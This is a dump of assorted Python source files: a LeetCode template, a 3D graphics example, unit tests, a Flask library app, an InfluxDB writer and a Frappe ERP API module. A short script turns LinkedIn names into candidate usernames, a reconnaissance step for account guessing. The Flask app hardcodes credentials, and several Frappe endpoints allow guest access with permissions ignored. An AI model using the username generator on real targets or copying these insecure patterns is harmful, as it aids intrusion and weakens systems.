text string | size int64 | token_count int64 |
|---|---|---|
# DRUNKWATER TEMPLATE(add description and prototypes)
# Question Title and Description on leetcode.com
# Function Declaration and Function Prototypes on leetcode.com
#731. My Calendar II
#Implement a MyCalendarTwo class to store your events. A new event can be added if adding the event will not cause a triple booking.
#Your class will have one method, book(int start, int end). Formally, this represents a booking on the half open interval [start, end), the range of real numbers x such that start <= x < end.
#A triple booking happens when three events have some non-empty intersection (ie., there is some time that is common to all 3 events.)
#For each call to the method MyCalendar.book, return true if the event can be added to the calendar successfully without causing a triple booking. Otherwise, return false and do not add the event to the calendar.
#Your class will be called like this: MyCalendar cal = new MyCalendar(); MyCalendar.book(start, end)
#Example 1:
#MyCalendar();
#MyCalendar.book(10, 20); // returns true
#MyCalendar.book(50, 60); // returns true
#MyCalendar.book(10, 40); // returns true
#MyCalendar.book(5, 15); // returns false
#MyCalendar.book(5, 10); // returns true
#MyCalendar.book(25, 55); // returns true
#Explanation:
#The first two events can be booked. The third event can be double booked.
#The fourth event (5, 15) can't be booked, because it would result in a triple booking.
#The fifth event (5, 10) can be booked, as it does not use time 10 which is already double booked.
#The sixth event (25, 55) can be booked, as the time in [25, 40) will be double booked with the third event;
#the time [40, 50) will be single booked, and the time [50, 55) will be double booked with the second event.
#Note:
#The number of calls to MyCalendar.book per test case will be at most 1000.
#In calls to MyCalendar.book(start, end), start and end are integers in the range [0, 10^9].
#class MyCalendarTwo(object):
# def __init__(self):
# def book(self, start, end):
# """
# :type start: int
# :type end: int
# :rtype: bool
# """
## Your MyCalendarTwo object will be instantiated and called as such:
## obj = MyCalendarTwo()
## param_1 = obj.book(start,end)
# Time Is Money | 2,243 | 691 |
import myPkgs.Scraper
# scraping data and save pickle
scraper=myPkgs.Scraper.Scraper()
scraper.setSubscriptionsPage()
scraper.getInfoFromSubScriptions()
# create mailHtml | 173 | 70 |
#!/usr/bin/env python
###
# Copyright (c) 2002-2007 Systems in Motion
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
###
# This is an example from the Inventor Mentor,
# chapter 5, example 6.
#
# This example shows the effect of different order of
# operation of transforms. The left object is first
# scaled, then rotated, and finally translated to the left.
# The right object is first rotated, then scaled, and finally
# translated to the right.
#
import sys
from pivy.coin import *
from pivy.sogui import *
def main():
# Initialize Inventor and Qt
myWindow = SoGui.init(sys.argv[0])
if myWindow == None: sys.exit(1)
root = SoSeparator()
# Create two separators, for left and right objects.
leftSep = SoSeparator()
rightSep = SoSeparator()
root.addChild(leftSep)
root.addChild(rightSep)
# Create the transformation nodes
leftTranslation = SoTranslation()
rightTranslation = SoTranslation()
myRotation = SoRotationXYZ()
myScale = SoScale()
# Fill in the values
leftTranslation.translation = (-1.0, 0.0, 0.0)
rightTranslation.translation = (1.0, 0.0, 0.0)
myRotation.angle = M_PI/2 # 90 degrees
myRotation.axis = SoRotationXYZ.X
myScale.scaleFactor = (2., 1., 3.)
# Add transforms to the scene.
leftSep.addChild(leftTranslation) # left graph
leftSep.addChild(myRotation) # then rotated
leftSep.addChild(myScale) # first scaled
rightSep.addChild(rightTranslation) # right graph
rightSep.addChild(myScale) # then scaled
rightSep.addChild(myRotation) # first rotated
# Read an object from file. (as in example 4.2.Lights)
myInput = SoInput()
if not myInput.openFile("temple.iv"):
sys.exit(1)
fileContents = SoDB.readAll(myInput)
if fileContents == None:
sys.exit(1)
# Add an instance of the object under each separator.
leftSep.addChild(fileContents)
rightSep.addChild(fileContents)
# Construct a renderArea and display the scene.
myViewer = SoGuiExaminerViewer(myWindow)
myViewer.setSceneGraph(root)
myViewer.setTitle("Transform Ordering")
myViewer.show()
myViewer.viewAll()
SoGui.show(myWindow)
SoGui.mainLoop()
if __name__ == "__main__":
main()
| 2,968 | 1,034 |
import os
import json
import pytest
from object_storage import DB
DB_FILE_NAME = "db.json"
def _create_test_db():
return DB("test", file_name=DB_FILE_NAME)
def _create_mock_obj():
return {
"programing_languages_features": {
"python": ["simple", "easy setup"],
"javascript": ["widespread usage", "powerfull"],
}
}
class TestAtributes(object):
def test_db_have_name(self):
new_db = _create_test_db()
assert new_db.name == "test"
def test_insert_retrieve_objects(self):
new_db = _create_test_db()
new_db.insert(key="topic", value="registration")
assert new_db.get("topic") == "registration"
color_list = ["blue", "red", "green"]
new_db.insert("color_list", color_list)
assert new_db.get("color_list") == color_list
new_db.insert("number", 9)
assert new_db.get("number") == 9
obj = _create_mock_obj()
new_db.insert("languages", obj)
assert new_db.get("languages") == obj
def test_db_saves_to_file(self):
new_db = _create_test_db()
obj = _create_mock_obj()
new_db.insert("languages", obj)
new_db.save()
assert os.stat("db.json") is not None
def test_db_saves_proper_data_to_file(self):
new_db = _create_test_db()
obj = _create_mock_obj()
new_db.insert("languages", obj)
new_db.save()
with open(DB_FILE_NAME, "r") as f:
loaded_obj = json.load(f)
assert loaded_obj == new_db.objects
def test_db_loads_from_file(self):
new_db = _create_test_db()
new_db.insert("number", 1)
new_db.save()
loaded_db = DB("test", DB_FILE_NAME, True)
assert loaded_db.objects == {"number": 1} | 1,796 | 616 |
from flask import Flask, flash, render_template, request, redirect, url_for
from flask_sqlalchemy import SQLAlchemy
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
class Config(object):
SQLALCHEMY_DATABASE_URI = "mysql://root:chuanzhi@127.0.0.1:3306/library"
SQLALCHEMY_TRACK_MODIFICATIONS = False
SECRET_KEY = "a13uo1ccl"
class Register(FlaskForm):
author = StringField("作者", render_kw={"placeholder": "添加作者"})
book = StringField("书名", render_kw={"placeholder": "添加书名"})
submit = SubmitField("添加")
app = Flask(__name__)
app.config.from_object(Config)
db = SQLAlchemy(app)
class Author(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(15), nullable=False)
books = db.relation("Book", backref="author")
def __repr__(self):
return "Author: {} {}".format(self.name, self.id)
class Book(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(30), nullable=False)
author_id = db.Column(db.Integer, db.ForeignKey(Author.id))
def __repr__(self):
return "Book: {} {}".format(self.name, self.id)
@app.route('/', methods=['GET', 'POST'])
def index():
form = Register()
if request.method == "POST":
if form.validate_on_submit():
author_name = request.form.get("author")
book_name = request.form.get("book")
author = Author.query.filter(Author.name == author_name).first()
if author:
# 有作者只添加书籍
book = Book.query.filter(Book.name == book_name).first()
if book:
flash("已经有此书了,请勿重复添加")
else:
new_book = Book(name=book_name, author_id=author.id)
db.session.add(new_book)
db.session.commit()
else:
# 没有该作者,添加作者再添加书籍
new_author = Author(name=author_name)
db.session.add(new_author)
db.session.commit()
new_book = Book(name=book_name, author_id=new_author.id)
db.session.add(new_book)
db.session.commit()
else:
flash("参数错误")
authors = Author.query.all()
return render_template("temp4_72.html", form=form, authors=authors)
@app.route('/del_book/<book_id>')
def del_book(book_id):
delbook = Book.query.get(book_id)
if delbook:
try:
db.session.delete(delbook)
except Exception as e:
flash(e)
db.session.rollback()
finally:
db.session.commit()
else:
flash("书名不存在。。。")
return redirect(url_for("index"))
@app.route('/del_author/<author_id>')
def del_author(author_id):
delauthor = Author.query.get(author_id)
if delauthor:
# 删除作者需要先删除旗下所有书籍
books = Book.query.filter(author_id == Book.author_id)
try:
for book in books:
db.session.delete(book)
db.session.delete(delauthor)
except Exception as e:
flash(e)
db.session.rollback()
finally:
db.session.commit()
else:
flash("作者不存在。。。")
return redirect(url_for("index"))
if __name__ == "__main__":
db.drop_all()
# 创建所有表
db.create_all()
# 生成数据
au1 = Author(name='老王')
au2 = Author(name='老尹')
au3 = Author(name='老刘')
# 把数据提交给用户会话
db.session.add_all([au1, au2, au3])
db.session.commit()
bk1 = Book(name='老王回忆录', author_id=au1.id)
bk2 = Book(name='我读书少,你别骗我', author_id=au1.id)
bk3 = Book(name='如何才能让自己更骚', author_id=au2.id)
bk4 = Book(name='怎样征服美丽少女', author_id=au3.id)
bk5 = Book(name='如何征服英俊少男', author_id=au3.id)
# 把数据提交给用户会话
db.session.add_all([bk1, bk2, bk3, bk4, bk5])
# 提交会话
db.session.commit()
app.run(debug=True)
| 3,898 | 1,471 |
import pycats.instances # noqa: F401
def test_semigroup():
a = {1, 2}
b = {2, 4}
actual = a.combine(b)
expected = {1, 2, 4}
assert actual == expected
def test_monoid():
actual = list.unit()
expected = list()
assert actual == expected
def test_functor():
a = {1, 2, 3}
actual = a.map(lambda x: x + 2)
expected = {3, 4, 5}
assert actual == expected
| 404 | 167 |
with open("linkedin.txt", "r") as fp:
for name in iter(fp):
first, last = name.strip().lower().split(" ")
print first + "." + last # david.lightman
print first + last # davidlightman
fl = first[0] + last
lf = last + first[0]
print fl # dlightman
print lf # lightmand
print fl[:8] # dlightma
print fl[:7] + "2" # dlightm2
print fl[:7] + "3" # dlightm2
print lf[:8] # davidlig
print lf[:7] + "2" # davidli2
print lf[:7] + "3" # davidli3
| 582 | 220 |
from argparse import ArgumentParser
from influxdb import InfluxDBClient
import datetime
import geohash
def main():
parser = ArgumentParser(
description="Writes some example FIXM data to InfluxDB")
parser.add_argument("--hostname", type=str, default="localhost",
help="The hostname of InfluxDB")
parser.add_argument("--port", type=int, default=8086,
help="The port to connect to InfluxDB on")
parser.add_argument("--username", type=str, default="root",
help="The username to authenticate with InfluxDB")
parser.add_argument("--password", type=str, default="root",
help="The password to authenticate with InfluxDB")
parser.add_argument("--database", type=str, default="fixm",
help="The name of the database to write to")
args = parser.parse_args()
client = InfluxDBClient(args.hostname, args.port,
args.username, args.password,
args.database)
client.create_database(args.database)
latitude = 33.626675
longitude = -112.1024746
current_time = datetime.datetime.now()
for i in range(10):
# Generate a Geohash given the coordinates of the aircraft. A geohash
# allows us to do a "fuzzy search" of all aircraft within the same
# grid cell. As the geohash precision increases, the size of the grid
# cells become smaller. I chose 4 here because that allows for a
# precision of +/- 20 km. That's the closest precision we can get to
# 9 km, which I think is the closest airplanes are allowed to fly to
# each other based on a quick search.
ghash = geohash.encode(latitude, longitude, precision=4)
# A point is a single row of data in a measurement
points = [
{
# The measurement is analogous to a table in SQL. It's the
# type of data we're writing.
"measurement": "location",
# Tags are fields of the point that are indexed. They're the
# data we expect to look points up by.
"tags": {
"centre": "ZLA",
"flight_number": "N1220W",
"geohash": ghash,
},
# Time is the time that this point was recorded at
"time": current_time.isoformat(),
# Fields are like SQL fields, but unlike tags they are not
# indexed. This is where the real meat and potatoes of data
# goes.
"fields": {
"latitude": latitude,
"longitude": longitude,
},
},
]
client.write_points(points)
latitude += 0.01
current_time += datetime.timedelta(0, 1)
result = client.query("SELECT * FROM location")
print(f"Result: {result}")
if __name__ == "__main__":
main()
| 3,038 | 812 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import frappe
import json
from frappe import _
from frappe.utils import get_fullname, get_link_to_form, get_url_to_form
from datetime import date,datetime,timedelta
import jwt
import time
@frappe.whitelist()
def inventario(item_code):
inventario = frappe.get_all('Bin', filters={'item_code': item_code}, fields=['warehouse', 'actual_qty'] )
frappe.errprint(inventario)
return(inventario)
@frappe.whitelist()
def pings():
return 'pong'
def pingo():
return 'pongo'
# RG - Actualizar el campo de atrasado y factura en c/customer
# 1 - Al finalizar un Payment Entry se actualizaran todos los customers...Iniciamos calculando la fecha de update_atrasado
# 2 - Bloquear (congelado = 1, credit_limit = 1) a los mayores de 40 dias y desbloquear (congelado = 0, credit_limit = ) en < 40
# 3 - Si no existe SINV == "Unpaid" o "Overdue" mandar atrasado = 0
@frappe.whitelist()
def update_atrasado():
clientes = frappe.db.get_list('Customer',fields=['name'])
for c in clientes:
facturas = frappe.db.get_list('Sales Invoice', filters={ 'outstanding_amount': ['>', 1],'customer': c.name,'clave':['like', '%%CC%%'] },
fields=['name', 'outstanding_amount','posting_date'],
order_by='posting_date asc',
page_length=1,
as_list=True
)
if facturas:
today = date.today()
someday = facturas[0][2]
diff = today - someday
#frappe.errprint(diff.days)
#frappe.errprint(facturas[0][0])
#frappe.errprint(c.name)
if diff.days > 40:
frappe.db.sql("UPDATE tabCustomer set congelado = 1 ,credit_limit = 1 WHERE name = %s", (c.name))
frappe.errprint(c.name)
frappe.db.sql("UPDATE `tabSales Invoice` a left join tabCustomer b on a.customer = b.customer_name set congelado = 1, credit_limit = 1, b.atrasado = %s, b.factura = %s WHERE b.name = %s", (diff.days,facturas[0][0],c.name))
frappe.db.commit()
#else:
# frappe.db.sql("UPDATE tabCustomer SET congelado = 0 ,credit_limit = 0 WHERE name = %s", (c.name))
# frappe.db.commit()
return
# @ frappe.whitelist ()
# def ubicacion ():
# items = frappe.db.get_list ('Item', fields =['name', 'rack', 'ubicacion'])
# for c in items:
# ajustes = frappe.db.get_list ('Stock Reconciliation Item', fields =['name','item_code', 'anaquel', 'ubicacion'], order_by = 'creation desc')
# for a in ajustes:
# if c.ubicacion != a.rack:
# #frappe.errprint(c.name)
# frappe.errprint(a.anaquel)
# frappe.db.commit()
# #else /* : */
# # frappe.db.sql("UPDATE tabCustomer SET congelado = 0 ,credit_limit = 0 WHERE name = %s", (c.name))
# # frappe.db.commit()
# return
#
# @frappe.whitelist()
# def ruta(login_manager):
# ruta = frappe.db.get_value("User", login_manager.user,"ruta_login")
# frappe.errprint(ruta)
# frappe.local.response["home_page"] = ruta
# {"type":"Feature","properties":{},"geometry":{"type":"LineString","coordinates":[ [-118.383197,32.649782],[-115.382042,32.650772],[-115.380479,32.649689] ] }}]}"
@frappe.whitelist(allow_guest=True)
# carga los registros de ruta, filtra por usuario y fecha y envia feature collection al front
def get_rutas(user,date):
rutas = frappe.get_all('Ruta', fields=['cliente','nombre_prospecto','lat','lng','creation','comentario'], filters = {'usuario': user, 'date': date } , order_by='creation' )
frappe.errprint(rutas)
feature = """ { "type": "FeatureCollection" , "features":[ { "type" : "Feature","properties":{},"geometry":{"type":"LineString","coordinates": [ """
for i in rutas:
feature += """ [ """ + str(i.lng) + """,""" + str(i.lat) + """ ] """
if i == rutas[-1]:
feature += """ ]}}]}"""
else:
feature += """ , """
return feature
@frappe.whitelist(allow_guest=True)
# regresa la ruta para las tablas
def get_tabla(user,date):
rutas = frappe.get_all('Ruta', fields=['cliente','nombre_prospecto','lat','lng','time','comentario'], filters = {'usuario': user, 'date': date } , order_by='creation' )
return rutas
@frappe.whitelist(allow_guest=True)
# regresa los usuarios con el Role Profile de Vendedor para iniciar la captura en el app
def get_usuarios():
# u = frappe.db.sql("SELECT name from tabUser")
# return u
usuarios = frappe.get_all('User', fields=['name','full_name'], filters = {'role_profile_name': 'Vendedor'} , order_by='name' )
if usuarios:
return usuarios
else:
return('No encontrado')
@frappe.whitelist(allow_guest=True)
def generar_lead(owner,lead_name,email_id,numero,lead_owner,source,campaign_name,informacion_adicional,lead_type):
doc = frappe.get_doc({
"doctype": "Lead",
"user": "Administrator",
"owner": owner,
"lead_name": lead_name,
"email_id": email_id,
"numero": numero,
"lead_owner": lead_owner,
"source": source,
"campaign_name": campaign_name,
"informacion_adicional": informacion_adicional,
"lead_type": lead_type
})
doc.insert(ignore_permissions=True)
frappe.db.commit()
# return('Nuevo Lead: ' + str(doc.name))
# frappe.db.sql("UPDATE tabLead SET status='Asignado' WHERE source like '%Publicidad%'")
# frappe.db.commit()
frappe.sendmail(['egarcia@totall.mx',"{0}".format(doc.lead_owner)], \
subject=doc.name , \
content="Felicidades usted tiene un nuevo prospecto, de click en la liga para darle seguimiento. ¡Exito! "+frappe.utils.get_url_to_form(doc.doctype, doc.name),delayed=False)
@frappe.whitelist(allow_guest=True)
def recorrido(user,lat,lng):
frappe.log_error(title="Error latitud", message=lat + user)
doc = frappe.get_doc({
"doctype": "Recorrido",
"user": user.strip('"'),
"lng": lng,
"lat": lat,
"phone": user
})
doc.insert(ignore_permissions=True)
frappe.db.commit()
return('Nueva-Lectura Insertada: ' + str(doc.name))
@frappe.whitelist(allow_guest=True)
# carga las estaciones registradas y genera el archivo para el mapa
def get_estaciones():
estaciones = frappe.get_all('Estacion', fields=['nombre','lat','lng'])
feature = """ { "type": "FeatureCollection" , "features":[ """
for i in estaciones:
feature += """ { "type" : "Feature","properties":{"name": " """ + i.nombre + """ "},"geometry":{"type":"Point","coordinates":[""" + str(i.lat) + """,""" + str(i.lng) + """]}}"""
if i == estaciones[-1]:
feature += """ ]} """
else:
feature += """ , """
return feature
@frappe.whitelist(allow_guest=True)
def estaciones(estacion,lat,lng):
est = frappe.db.get_value("Estacion", estacion , "name")
if est:
frappe.db.sql("UPDATE tabEstacion SET lat=%s , lng= %s WHERE nombre = %s", (lat,lng,estacion))
frappe.db.commit()
return ('Estacion Actualizada.')
else:
return('no se encontro la estacion')
# est = frappe.db.get_value("Estacion", estacion , "name")
# if est:
# frappe.db.set_value("Estacion", estacion, 'lat', lat)
# frappe.db.set_value("Estacion", estacion , 'lng', lng)
# return ('Estacion Actualizada.')
# else:
# return('no se encontro la estacion')
# RG-Actualizar actual cantidad en Item
# falta hacer metodo para que todo Item tenga stock_maximo get_all stock_maximo < 0 (cambiarlo a int)
# otra ocsion - hacer metodo desde bin y calcular reorden desde ahi (quizas es mas facil)
# RG - En hooks - > events tenemos este metodo para "Bin": "on_update": "totall.api.update_actual"
# RG- Lo que hace es actualizar el punto de reorden (actual-stock maximo) para que se muestre en el reporte Max del Doctype Item
@frappe.whitelist()
def update_actual(self,method):
# m = str(self.name) + "item: " + str(self.item_code)
# frappe.log_error(title="New Update Actual Qty", message=m)
doc = frappe.get_doc("Item", self.item_code)
if self.warehouse == 'GENERAL - SAT':
doc.actual = self.actual_qty
doc.reorder = float(self.actual_qty) - float(self.stock_maximo)
doc.save()
frappe.errprint('Items actualizado')
# RG - En hooks - > events tenemos este metodo para "Item": "on_update": "totall.api.update_actual"
# RG- Lo que hace es actualizar el punto de reorden (actual-stock maximo) para que se muestre en el reporte Max del Doctype Item
@frappe.whitelist()
def update_actual_item(self,method):
# doc = frappe.get_doc("Item", self.name)
frappe.errprint('asas')
reorder = float(self.actual) - float(self.stock_maximo)
frappe.db.sql("UPDATE tabItem set reorder=%s WHERE name = %s", (str(reorder),self.name) )
# self.save()
# frappe.msgprint('El articulo ha sido actualizado.')
# RG-Este es un metodo que corrimos manualmente para actualizar las cantidades de Actual y Reorder en el Item (considerando el stock maximo)
#RG- ToDo - poner un metodo parecido en hooks > Events > Item > on_update para que recalcule
@frappe.whitelist()
def actual():
# doc = frappe.get_doc("Item", 'GUM78-ARE')
# doc.save()
items = frappe.get_all('Bin', filters={'warehouse': 'GENERAL - SAT'}, fields=['name', 'actual_qty','item_code'])
for i in items:
if 0 < i.actual_qty < 100:
doc = frappe.get_doc("Item", i.item_code)
doc.actual = i.actual_qty
doc.reorder = float(i.actual_qty) - float(doc.stock_maximo)
doc.save()
frappe.errprint(i.item_code + 'actual: ' + str(i.actual_qty) + ' max: ' + str(doc.stock_maximo) )
@frappe.whitelist()
def actualizar():
# para actualizar todos los items corri los queries desde la consola
# items = frappe.get_all('Bin', filters={'actual_qty':'0'}, fields = ['item_code'])
items = frappe.db.sql("SELECT name from tabItem WHERE actual IS NULL")
for i in items:
item = frappe.db.sql("SELECT actual from tabItem WHERE name = %s",i)
#item = frappe.db.sql("UPDATE tabItem set actual=0 WHERE name = %s",i)
frappe.errprint(item)
#r = frappe.get_doc("Item", items[1]['item_code'])
#frappe.errprint(items)
# poner en 0 TODOS los items que tengan null - puedes frappe.db.sql ('UPDATE')
# actualizar item.reorder float(i.actual) - float(doc.stock_maximo) para todos los Items.actual === 0
@frappe.whitelist()
def borrar():
return frappe.db.sql("DELETE from `tabBin` where warehouse != 'GENERAL - SAT' and actual_qty = 0")
@frappe.whitelist()
def atrasado():
frappe.db.sql("UPDATE `tabSales Invoice` set outstanding_amount = 0, status = 'Paid' where outstanding_amount like '0.%' or outstanding_amount like '-%%'")
frappe.db.sql("UPDATE `tabPurchase Invoice` set outstanding_amount = 0, status = 'Paid' where outstanding_amount like '0.%' or outstanding_amount like '-%%'")
frappe.db.sql("UPDATE `tabSales Invoice` a left join `tabCustomer` b on a.customer = b.customer_name set b.atrasado = DATEDIFF(CURDATE(), a.posting_date), b.factura = a.name where a.status = 'Overdue' or a.status = 'Unpaid'")
frappe.db.sql("UPDATE `tabCustomer` set congelado = 1, credit_limit = 1 where atrasado >= 40 and clave like '%%CC%%'")
frappe.db.sql("UPDATE `tabCustomer` set congelado = 0, credit_limit = 0 where atrasado < 40 and clave like '%%CC%%'")
frappe.db.sql("UPDATE `tabSales Invoice` a left join `tabCustomer` b on a.customer = b.customer_name set b.atrasado = 0 where a.customer not in (Select customer from `tabSales Invoice` where status = 'Overdue' or status = 'Unpaid')")
frappe.db.sql("update `tabPayment Entry` INNER JOIN (SELECT party, MAX(creation) AS 'tranc_date' FROM `tabPayment Entry` where party_type = 'customer' AND `tabPayment Entry`.name not like 'AJUSTE%' GROUP BY party) as max_creation ON `tabPayment Entry`.party = max_creation.party AND `tabPayment Entry`.creation = max_creation.tranc_date left JOIN `tabCustomer` b on max_creation.party = b.customer_name set b.latest_payment = `tabPayment Entry`.name, b.date_latest_payment = `tabPayment Entry`.creation ")
frappe.db.sql("update `tabPayment Entry` INNER JOIN (SELECT party, MAX(creation) AS 'tranc_date' FROM `tabPayment Entry` where party_type = 'supplier' AND `tabPayment Entry`.name not like 'AJUSTE%' GROUP BY party) as max_creation ON `tabPayment Entry`.party = max_creation.party AND `tabPayment Entry`.creation = max_creation.tranc_date left JOIN `tabSupplier` b on max_creation.party = b.supplier_name set b.latest_payment = `tabPayment Entry`.name, b.date_latest_payment = `tabPayment Entry`.creation ")
@frappe.whitelist()
def factura_global():
frappe.db.sql("UPDATE `tabCFDI` set grand_total = total")
@frappe.whitelist()
def sin_timbrar():
frappe.db.sql("UPDATE `tabSales Invoice` set sin_timbrar = DATEDIFF(CURDATE(), creation) where cfdi_status='Sin Timbrar'")
@frappe.whitelist()
def nuevas_facturas():
anteriores = frappe.db.sql("""SELECT name,creation,date_sub(NOW(),INTERVAL 5 HOUR),TIMESTAMPDIFF(HOUR,creation,date_sub(NOW(),INTERVAL 5 HOUR)) FROM `tabSales Invoice` WHERE docstatus = %s AND TIMESTAMPDIFF(HOUR,creation,date_sub(NOW(),INTERVAL 5 HOUR)) > 24""", (0), as_dict=1)
for a in anteriores:
frappe.db.sql("""UPDATE `tabSales Invoice` SET docstatus = 2, observaciones ='Factura cancelada por tiempo de espera excedido' WHERE name =%s""",(a.name),as_dict=1)
@frappe.whitelist()
def genera_cotizacion(name='PUR-SQTN-2021-00001'):
si = frappe.get_doc('Supplier Quotation', name)
articulosproveedor = si.items
articulosventa = {}
margen = si.margen
#return
frappe.errprint(margen)
doc = frappe.new_doc('Quotation')
articulosventa = doc.items
for a in articulos:
a.item_code
a.amount = a.amount*margen
a.valuation_rate = a.rate
for b in articulosventa:
b.item_code = a.item_code
b.amount = a.amount*margen
doc.save()
frappe.msgprint('Cotizacion Generada')
# doc.append("items", {
# "item_code": si.items[0].item_code ,
# "qty": 1,
# "precio_de_venta": si.monto / 1.16,
# "monto": si.monto / 1.16,
# "precio_unitario_neto": si.monto / 1.16,
# "precio_neto": si.monto / 1.16,
# "tax": 16,
# "impuestos_totales": (si.monto / 1.16) * 0.16
# })
#
# doc.append("si_sustitucion", {
# "tipo_documento": "Sales Invoice" ,
# "sales_invoice": si.name,
# "uuid": si.uuid,
# "valor": si.monto
# })
#
#
#
@frappe.whitelist()
def boton(name):
pos = frappe.get_doc('POS Invoice', name)
doc = frappe.new_doc('Sales Invoice')
doc.items = pos.items
doc.customer = pos.customer
doc.perfil_facturacion = 'TICKET'
doc.is_pos = 1
doc.update_stock = 1
doc.naming_series = 'TICKET'
doc.append("payments", {
"mode_of_payment": 'Efectivo',
"account": '101.01 - Caja y efectivo - SAT',
"amount": pos.grand_total,
"type": 'Cash',
"base_amount": pos.base_grand_total
})
doc.save()
doc.submit()
frappe.errprint(doc.name)
@frappe.whitelist()
def update_payment_entry(name):
doc = frappe.get_doc('Payment Entry',name)
references = doc.references
gran_total_original = 0
for r in references:
si = frappe.get_doc('Sales Invoice', r.reference_name)
gran_total_original += round(si.monto_pendiente, 2)
frappe.db.set_value("Payment Entry Reference", r.name, 'monto_pendiente', si.monto_pendiente)
#frappe.db.set_value("Payment Entry", doc.name, 'total_original', gran_total_original)
frappe.errprint(gran_total_original)
@frappe.whitelist()
def saldos_cero():
frappe.db.sql("""update `tabGL Entry` a LEFT JOIN `tabPayment Entry` b ON a.voucher_no = b.name SET a.credit_in_account_currency = 0 , a.credit = 0 where b.unallocated_amount = a.credit_in_account_currency AND b.unallocated_amount = a.credit AND b.unallocated_amount > 0 AND b.docstatus = 1""")
frappe.db.sql("""update `tabSales Invoice` SET outstanding_amount = 0 WHERE outstanding_amount < 0""")
@frappe.whitelist()
def crear_pago(name):
doc = frappe.get_doc('CFDI Nota de Credito',name)
cliente = frappe.get_doc('Customer',doc.customer)
today = date.today()
frappe.errprint(doc.name)
frappe.errprint(doc.conversion_rate)
pii = frappe.new_doc("Payment Entry")
pii.mode_of_payment = 'Transferencia bancaria'
# pii.payment_type = 'Pay'
pii.party_type = 'Customer'
pii.party = doc.customer
pii.posting_date = today.strftime("%Y-%m-%d") #Daniel Acosta: Estaba mostrando un error de Fiscal Year al generar el payment entry
# if doc.forma_de_pago != '01':
# pii.paid_from = company.default_cash_account
# else:
# pii.paid_from = company.default_bank_account
#pii.paid_to = company.default_receivable_account #frappe.get_value("Company",doc.company,'default_receivable_account')
# pii.paid_to_account_currency = doc.currency
# pii.paid_to = doc.paid_to
pii.reference_no = doc.name
pii.naming_series = 'NC-'
# RG - Los clientes con currency != MXN solo pueden hacaer transacciones en su moneda nativa (ej. USD)
# RG - Los clientes sin default_currency o con MXN pueden transaccionar en cualquier moneda
# RG - Los payment entries derivados de los descuentos automaticos NO podran timbrarse.
pii.paid_amount = float(doc.total) * float(doc.conversion_rate)
pii.source_exchange_rate = 1
pii.target_exchange_rate = 1
pii.received_amount = float(doc.total) * float(doc.conversion_rate)
company = frappe.get_doc('Company', pii.company)
pii.paid_to = '102.01 - Bancos nacionales - ' + company.abbr
# frappe.errprint(float(doc.total) * float(doc.conversion_rate))
for i in doc.si_sustitucion:
pii.append('references', {
'reference_doctype': 'Sales Invoice',
'reference_name': i.sales_invoice,
'allocated_amount': float(i.valor) * float(doc.conversion_rate),
'pagado': float(i.valor) * float(doc.conversion_rate),#cambio hecho por Santiago
})
pii.flags.ignore_permissions = True
pii.flags.ignore_mandatory = True
frappe.errprint(pii.party)
frappe.errprint(pii.paid_to)
# pii.flags.ignore_validate = True
pii.submit()
frappe.db.set_value("CFDI Nota de Credito", name, 'pago', pii.name)
doc.pago = pii.name
frappe.msgprint('Devolucion monetaria generada : ' + '<a href="#Form/Payment Entry/' + pii.name + '"target="_blank">' + pii.name + '</a>' )
doc.reload()
@frappe.whitelist()
def create_stock_entry(name):
doc = frappe.get_doc('CFDI Nota de Credito',name)
if doc.tipo_de_factura == "Devolucion":
pii = frappe.new_doc("Stock Entry")
pii.stock_entry_type = "Material Receipt"
pii.naming_series = "STE-"
for i in doc.items:
pii.append('items', {
'item_code': i.item_code,
'qty': i.qty,
'uom': i.stock_uom,
't_warehouse': i.warehouse,
})
pii.flags.ignore_permissions = True
pii.submit()
frappe.msgprint('Devolucion de Inventario generada : ' + '<a href="#Form/Stock Entry/' + pii.name + '"target="_blank">' + pii.name + '</a>' )
frappe.errprint('HECHO')
# RG - Crear Pago
@frappe.whitelist()
def cancelar_pago(name):
doc = frappe.get_doc('CFDI Nota de Credito', name)
pii = frappe.get_doc('Payment Entry', doc.pago)
pii.cancel()
@frappe.whitelist()
def quitar_tags_item_description():
frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""")
frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'</p></div>',''))""")
frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'</p><p>',' '))""")
frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""")
frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'</p></div>',''))""")
frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'<div><p>',''))""")
frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'</p><p>',' '))""")
frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'<br>',''))""")
frappe.db.sql("""update `tabDelivery Note Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""")
frappe.db.sql("""update `tabDelivery Note Item` set description = (replace(description,'</p></div>',''))""")
frappe.db.sql("""update `tabDelivery Note Item` set description = (replace(description,'</p><p>',' '))""")
frappe.errprint('Tags Eliminados')
@frappe.whitelist()
def quitar_tags_item():
frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""")
frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'</p></div>',''))""")
frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'</p><p>',' '))""")
